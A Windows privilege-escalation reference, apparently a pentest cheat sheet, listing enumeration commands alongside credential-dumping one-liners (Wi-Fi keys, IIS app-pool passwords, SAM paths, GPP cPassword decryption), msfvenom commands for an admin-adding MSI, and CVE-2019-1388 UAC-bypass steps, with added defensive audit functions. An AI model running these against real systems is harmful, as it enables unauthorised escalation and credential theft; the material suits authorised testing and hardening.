```bash
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
```

```powershell
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
```
Version Exploits
This website is useful for searching detailed information about Microsoft security vulnerabilities. The database contains more than 4,700 security vulnerabilities, which shows the massive attack surface a Windows environment presents.
ConsoleHost_history

```powershell
#Find the PATH where it is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
```

```powershell
#Check if transcription is enabled in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
```
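The registry queries above only tell you whether the Transcription policy key exists. The following function is an added example, not code from the original page: it reads the three PowerShell logging policies (Transcription, ScriptBlockLogging and ModuleLogging) from both HKLM and HKCU and reports whether each is actually enforced, which is the check a defender wants before relying on transcripts or script block logs as evidence. The value names used (`EnableTranscripting`, `EnableScriptBlockLogging`, `EnableModuleLogging`, `OutputDirectory`) are the documented policy values.

```powershell
# Added example (not from the original page): report the effective state of the
# PowerShell logging policies that the reg query lines above inspect.
function Get-PowerShellLoggingPolicy {
    # Policy subkey name and the DWORD that switches it on
    $policies = @(
        @{ Name = 'Transcription';      Value = 'EnableTranscripting' },
        @{ Name = 'ScriptBlockLogging'; Value = 'EnableScriptBlockLogging' },
        @{ Name = 'ModuleLogging';      Value = 'EnableModuleLogging' }
    )

    foreach ($hive in @('HKLM', 'HKCU')) {
        foreach ($p in $policies) {
            $key = "$($hive):\Software\Policies\Microsoft\Windows\PowerShell\$($p.Name)"
            $enabled   = $false
            $outputDir = $null

            if (Test-Path -Path $key) {
                $item = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
                # Dynamic property access: $item.EnableTranscripting etc.
                $enabled = ($item.($p.Value) -eq 1)
                if ($p.Name -eq 'Transcription') { $outputDir = $item.OutputDirectory }
            }

            [PSCustomObject]@{
                Hive      = $hive
                Policy    = $p.Name
                Enabled   = $enabled
                OutputDir = $outputDir
            }
        }
    }
}

# Usage: one row per hive/policy pair; a blank OutputDir with Transcription
# enabled means transcripts land in the user's Documents folder by default.
Get-PowerShellLoggingPolicy | Format-Table -AutoSize
```

A machine where every row shows `Enabled = False` has no policy-driven PowerShell logging at all, which is the state the `reg query` lines above are meant to reveal.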
```bash
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
```

```bash
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
```
```bash
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
    for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
        icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
    )
)
```

```bash
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
```
You can also use sc and icacls:

```bash
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
```
Service registry modify permissions
You should check whether you can modify any service registry key.
You can check your permissions over a service registry key with:

```bash
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
```
```bash
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v '\"' # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
```

```bash
accesschk.exe /accepteula

# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\

# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
```

```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```
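The `reg save`/`reg restore` loop in the service-registry section and the `wmic`/`findstr` filters above both answer the same audit question in a lossy way: the registry loop actually writes to every service key, and the `findstr` chain flags any path without quotes, including ones with no space. The function below is an added example, not code from the original page or from PowerUp: it walks `HKLM:\SYSTEM\CurrentControlSet\Services` read-only, reports ImagePath values that are unquoted and contain a space (skipping the Windows directory, as the `wmic` filter does), and reports service keys whose ACL grants write-type rights to low-privileged principals. The principal list and the exclusion pattern are assumptions you may need to extend for your environment.

```powershell
# Added example (not from the original page): read-only audit of services for
# unquoted ImagePath values and for registry keys writable by low-privileged users.
function Get-ServiceMisconfiguration {
    $servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

    # Principals that should never hold write rights on a service key (assumed list)
    $lowPrivPrincipals = @(
        'Everyone',
        'BUILTIN\Users',
        'NT AUTHORITY\Authenticated Users',
        'NT AUTHORITY\INTERACTIVE'
    )

    # Rights that let a caller change how the service starts. ReadPermissions is
    # deliberately left out: ReadKey shares that bit, so including it would flag
    # every read-only ACE as writable.
    $writeRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
                   [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                   [System.Security.AccessControl.RegistryRights]::Delete -bor
                   [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                   [System.Security.AccessControl.RegistryRights]::TakeOwnership

    foreach ($key in Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue) {
        $props     = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        $imagePath = [string]$props.ImagePath

        # 1. Unquoted ImagePath: the executable part contains a space and is not quoted.
        #    Paths under the Windows directory are skipped, as the wmic filter above does.
        if ($imagePath -and -not $imagePath.StartsWith('"')) {
            $exePart = $imagePath -replace '^\\\?\?\\', ''          # drop the \??\ prefix
            $m = [regex]::Match($exePart, '^(.*?\.exe)', 'IgnoreCase')
            if ($m.Success) { $exePart = $m.Groups[1].Value }     # drop arguments after the .exe
            if ($exePart -match '\s' -and
                $exePart -notmatch '^(%SystemRoot%|\\SystemRoot|system32|C:\\Windows)') {
                [PSCustomObject]@{ Service = $key.PSChildName; Issue = 'UnquotedImagePath'; Detail = $imagePath }
            }
        }

        # 2. Weak ACL on the service's registry key
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.RegistryRights -band $writeRights) -ne 0) {
                [PSCustomObject]@{
                    Service = $key.PSChildName
                    Issue   = 'WritableServiceKey'
                    Detail  = "$($ace.IdentityReference.Value) : $($ace.RegistryRights)"
                }
            }
        }
    }
}

# Usage: an empty table is the expected result on a correctly configured host.
Get-ServiceMisconfiguration | Format-Table -AutoSize
```

Because the function only reads, it is safe to run as part of a scheduled baseline; any `UnquotedImagePath` row is fixed by quoting the path in the service configuration, and any `WritableServiceKey` row by removing the offending ACE.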
hosts file
Check for other known computers hardcoded in the hosts file

```bash
type C:\Windows\System32\drivers\etc\hosts
```
Network Interfaces & DNS

```bash
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
Open Ports
Check for restricted services from the outside

```bash
netstat -ano #Opened ports?
```
Route Table

```bash
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
```
ARP Table

```bash
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
```
```bash
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
```

```bash
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```
Saved RDP Connections
You can find them under HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\ and HKCU\Software\Microsoft\Terminal Server Client\Servers\.
```powershell
function Get-ApplicationHost {
    $OrigError = $ErrorActionPreference
    $ErrorActionPreference = "SilentlyContinue"

    # Check if appcmd.exe exists
    if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
        # Create data table to house results
        $DataTable = New-Object System.Data.DataTable

        # Create and name columns in the data table
        $Null = $DataTable.Columns.Add("user")
        $Null = $DataTable.Columns.Add("pass")
        $Null = $DataTable.Columns.Add("type")
        $Null = $DataTable.Columns.Add("vdir")
        $Null = $DataTable.Columns.Add("apppool")

        # Get list of application pools
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
            # Get application pool name
            $PoolName = $_

            # Get username
            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
            $PoolUser = Invoke-Expression $PoolUserCmd

            # Get password
            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
            $PoolPassword = Invoke-Expression $PoolPasswordCmd

            # Check if credentials exist
            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword, 'Application Pool', 'NA', $PoolName)
            }
        }

        # Get list of virtual directories
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
            # Get Virtual Directory Name
            $VdirName = $_

            # Get username
            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
            $VdirUser = Invoke-Expression $VdirUserCmd

            # Get password
            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
            $VdirPassword = Invoke-Expression $VdirPasswordCmd

            # Check if credentials exist
            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword, 'Virtual Directory', $VdirName, 'NA')
            }
        }

        # Check if any passwords were found
        if ($DataTable.rows.Count -gt 0) {
            # Display results in list view that can feed into the pipeline
            $DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
        }
        else {
            # Status user
            Write-Verbose 'No application pool or virtual directory passwords were found.'
            $False
        }
    }
    else {
        Write-Verbose 'Appcmd.exe does not exist in the default location.'
        $False
    }
    $ErrorActionPreference = $OrigError
}
```
```bash
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
```

```bash
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
Cloud Credentials

```bash
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
```
McAfee SiteList.xml
Search for a file called SiteList.xml
Cached GPP Password
There was previously a feature that allowed custom local administrator accounts to be deployed on a group of machines via Group Policy Preferences (GPP). This method had serious security flaws. First, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be read by any domain user. Second, the passwords inside these GPPs were encrypted with AES256 using a publicly documented default key, so any authenticated user could decrypt them. This posed a serious risk, since it could allow users to obtain elevated privileges.
Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (prior to Windows Vista) for these files:
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
To decrypt the cPassword:

```bash
#To decrypt these passwords you can use
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
```
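The cached-GPP section above lists the six preference files and the two history folders to search. The function below is an added example, not code from the original page: it walks those folders (and, when the host is domain-joined, the SYSVOL share, which is an assumption keyed on the `USERDNSDOMAIN` environment variable), parses each matching XML file, and reports every element that still carries a `cPassword` attribute, so a defender can find and remove lingering GPP credentials without decrypting anything. The attribute names used to label the account (`userName`, `username`, `accountName`, `runAs`) are the ones the different preference types use.

```powershell
# Added example (not from the original page): locate GPP XML files that still
# contain a cPassword attribute. Read-only; nothing is decrypted.
function Find-GppCPassword {
    param([string[]]$SearchRoot)

    if (-not $SearchRoot) {
        # Default roots: the two local history folders named above, plus SYSVOL
        # when the host is domain-joined (assumption: USERDNSDOMAIN is set then).
        $SearchRoot = @(
            "$env:ProgramData\Microsoft\Group Policy\history",
            'C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history'
        )
        if ($env:USERDNSDOMAIN) { $SearchRoot += "\\$env:USERDNSDOMAIN\SYSVOL" }
    }

    # The six preference files that can carry a cPassword attribute
    $gppFiles = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Printers.xml','Drives.xml'
    # Attribute names the different preference types use for the account
    $accountAttrs = 'userName','username','accountName','runAs'

    foreach ($root in $SearchRoot) {
        if (-not (Test-Path -LiteralPath $root)) { continue }

        Get-ChildItem -LiteralPath $root -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $gppFiles -contains $_.Name } |
        ForEach-Object {
            $file = $_
            try   { [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop }
            catch { return }   # unreadable or malformed XML: skip this file

            # Any element carrying a cPassword attribute is a finding, whatever the preference type
            foreach ($node in $doc.SelectNodes('//*[@cPassword]')) {
                $account = ''
                foreach ($attr in $accountAttrs) {
                    if ($node.HasAttribute($attr)) { $account = $node.GetAttribute($attr); break }
                }
                [PSCustomObject]@{
                    File     = $file.FullName
                    Element  = $node.LocalName
                    Account  = $account
                    HasValue = -not [string]::IsNullOrEmpty($node.GetAttribute('cPassword'))
                }
            }
        }
    }
}

# Usage: any row with HasValue = True is a stored credential that should be
# removed from the preference and the account's password rotated.
Find-GppCPassword | Format-Table -AutoSize
```

Running it against SYSVOL from a domain controller covers every GPO in the domain; running it locally only covers the preferences this machine has already applied.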
From a low-privilege user to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC bypass
If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it is possible to run a terminal or any other process as "NT\AUTHORITY SYSTEM" from an unprivileged user.
This makes it possible to escalate privileges and bypass UAC at the same time with the same vulnerability. Additionally, there is no need to install anything, and the binary used during the process is signed and issued by Microsoft.
Some of the affected systems are the following:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
To exploit this vulnerability, the following steps must be performed:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
From SeDebug + SeImpersonate to Full Token privileges
If you have these token privileges (you will probably find them in an already High Integrity process), you will be able to open almost any process (non-protected processes) with the SeDebug privilege, copy the token of that process, and create an arbitrary process with that token.
With this technique it is usual to select any process running as SYSTEM that has all the token privileges (yes, you can find SYSTEM processes without all the token privileges).
You can find an example of code that executes the proposed technique here.